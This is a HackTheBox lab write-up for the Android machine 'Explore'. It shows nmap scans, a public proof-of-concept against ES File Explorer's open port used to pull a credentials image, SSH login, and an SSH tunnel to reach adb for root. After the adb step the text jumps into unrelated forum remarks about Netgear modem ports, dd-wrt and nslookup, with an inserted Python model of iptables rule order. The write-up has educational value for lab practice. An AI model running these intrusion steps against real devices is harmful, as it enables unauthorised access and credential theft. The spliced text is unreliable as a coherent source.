Explore is a very easy Android machine from HackTheBox where the attacker has to exploit a vulnerability in the application ES File Explorer in order to obtain RCE on the machine and, with it, the user credentials. Later, the attacker has to use an SSH tunnel in order to reach the device with adb and become root.

Enumeration

As always, let's start by finding all open ports on the machine with nmap.

sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.247
Nmap done: 1 IP address (1 host up) scanned in 168.58 seconds

Then we continue with a deeper scan of every open port on 10.10.10.247 to get more information about each service.

2222/tcp  open     ssh      (protocol 2.0)
| fingerprint-strings:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
42135/tcp open     http     ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http     Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at:
Service detection performed.
# Nmap done at Sat Jun 26 17:26:02 2021 - 1 IP address (1 host up) scanned in 109.46 seconds

Port 5555 shows up in service lists for Freeciv (versions up to 2.0, a free and open source empire-building strategy game), Hewlett-Packard Data Protector, McAfee EndPoint Encryption Database Server, SAP and, by default, Microsoft Dynamics CRM 4.0. Looking on Google for information about each port, we discover that port 59777 is used by the application ES File Explorer and has a CVE with a PoC on GitHub.

Exploitation

Executing the PoC we can obtain the list of pictures stored on the device.

kali:/tmp/ESFileExplorerOpenPortVuln$ python3 poc.py -cmd listPics -host 10.10.10.247
Executing command: listPics on 10.10.10.247
Server responded with: 200

Among them there is a file named creds.jpg that we can download with the following command.

kali:/tmp/ESFileExplorerOpenPortVuln$ python3 poc.py -g /storage/emulated/0/DCIM/creds.jpg -host 10.10.10.247
Server responded with: 200
Writing to file: creds.jpg

In this photo we can read the user kristi and the password that can be used to log in through SSH. The user flag can be found at /sdcard/user.txt.

kali:~/Documents/HTB/Explore$ ssh -p 2222 kristi
:/sdcard $ cat user.txt

Looking inside the file /etc/init.sh we can see that port 5555 is blocked by iptables, so we cannot reach the device with adb unless we create an SSH tunnel.

iptables -A INPUT -p tcp --dport 5555 -j DROP
iptables -A INPUT -p tcp -s localhost --dport 5555 -j ACCEPT

In order to create that tunnel we need to execute the following command.

kali:~/Documents/HTB/Explore$ ssh -p 2222 kristi -L localhost:5555:localhost:5555 -fN

The flag -L forwards local port 5555 to port 5555 on the device. The flag -f puts SSH in the background so we can keep executing commands in the terminal. The flag -N tells SSH that we do not want to execute any remote command.

Once the tunnel has been created we can connect to the device with adb and become root pretty easily.

Port 80 is HTTP, so just point Firefox to your modem's address and you will get your modem's config screen. So those extra ports are, I think, to support the smart config tools. I generally download dd-wrt to my modems, so they are removed.
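The following Python is an added illustration, not code from the Explore writeup above or from the box itself. It models how iptables evaluates the two INPUT rules quoted from /etc/init.sh with first-match semantics, and why adb through the SSH local forward is seen by the filter as coming from 127.0.0.1: sshd on the device opens the connection to port 5555 itself, so the source address is the device's loopback no matter where adb runs. The model also makes one caveat visible: iptables takes the first matching rule, so if the two rules really are appended with -A in the order shown, the DROP shadows the localhost ACCEPT, and the exception only works when the ACCEPT sits earlier in the chain (for example inserted with -I). The attacker address and the chain's default policy are assumptions, as is the reduction of a rule to just target, port and source.

```python
"""Added example, not from the writeup: a first-match model of the INPUT rules
found in /etc/init.sh, to show why adb over the SSH local forward is treated
differently from a direct connection, and why rule order matters."""
from dataclasses import dataclass
from typing import List, Optional

ADB_PORT = 5555
LOCALHOST = "127.0.0.1"        # what "-s localhost" resolves to
ATTACKER = "10.10.14.5"        # constructed attacker address, not from the writeup


@dataclass(frozen=True)
class Rule:
    """One iptables rule reduced to the fields the writeup's two rules use."""
    target: str                # "ACCEPT" or "DROP"
    dport: int                 # --dport
    src: Optional[str] = None  # -s; None matches any source


def evaluate(chain: List[Rule], src: str, dport: int, policy: str = "ACCEPT") -> str:
    """Walk the chain top to bottom; the first matching rule decides.
    If nothing matches, the chain's default policy applies (assumed ACCEPT here)."""
    for rule in chain:
        if rule.dport == dport and rule.src in (None, src):
            return rule.target
    return policy


# The two rules exactly as the writeup lists them, appended (-A) in this order.
CHAIN_AS_LISTED = [
    Rule("DROP", ADB_PORT),
    Rule("ACCEPT", ADB_PORT, src=LOCALHOST),
]

# The same rules with the localhost exception ahead of the DROP, e.g. inserted with -I.
CHAIN_EXCEPTION_FIRST = [
    Rule("ACCEPT", ADB_PORT, src=LOCALHOST),
    Rule("DROP", ADB_PORT),
]


def direct_adb(chain: List[Rule]) -> str:
    """Verdict for 'adb connect 10.10.10.247:5555' straight from the attacker's box."""
    return evaluate(chain, ATTACKER, ADB_PORT)


def tunneled_adb(chain: List[Rule]) -> str:
    """Verdict for 'adb connect localhost:5555' through
    'ssh -L localhost:5555:localhost:5555 -fN'. sshd on the device opens the
    connection to 5555 itself, so the INPUT chain sees source 127.0.0.1."""
    return evaluate(chain, LOCALHOST, ADB_PORT)


if __name__ == "__main__":
    for name, chain in (("as listed", CHAIN_AS_LISTED), ("exception first", CHAIN_EXCEPTION_FIRST)):
        print(f"{name:16} direct: {direct_adb(chain):6} tunnel: {tunneled_adb(chain)}")
```

Running the script prints a DROP for the direct connection under both orderings, and an ACCEPT for the tunneled connection only when the localhost rule precedes the DROP. When auditing a box like this one, `iptables -S INPUT` shows the chain in evaluation order, which is what decides the outcome, not the order the rules appear in a startup script.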
I think that the netgenie app uses port 5555 to talk to and set up the Netgear modem. In it they talk about netgenie making SOAP calls to the device on port 5555, which I understand is sort of a superset of, or uses, HTTP. The 3333 port, looking at that link, I'd guess is part of the netgenie discovery, but I could not find any support for that. To poke on DNS port 53, run nslookup and use the command "server IPaddress". Then ask it to resolve names to IP addresses. In any case I think you will find that the DHCP server is setting the DNS server to the router, and that will be using port 53, so it's being poked all the time.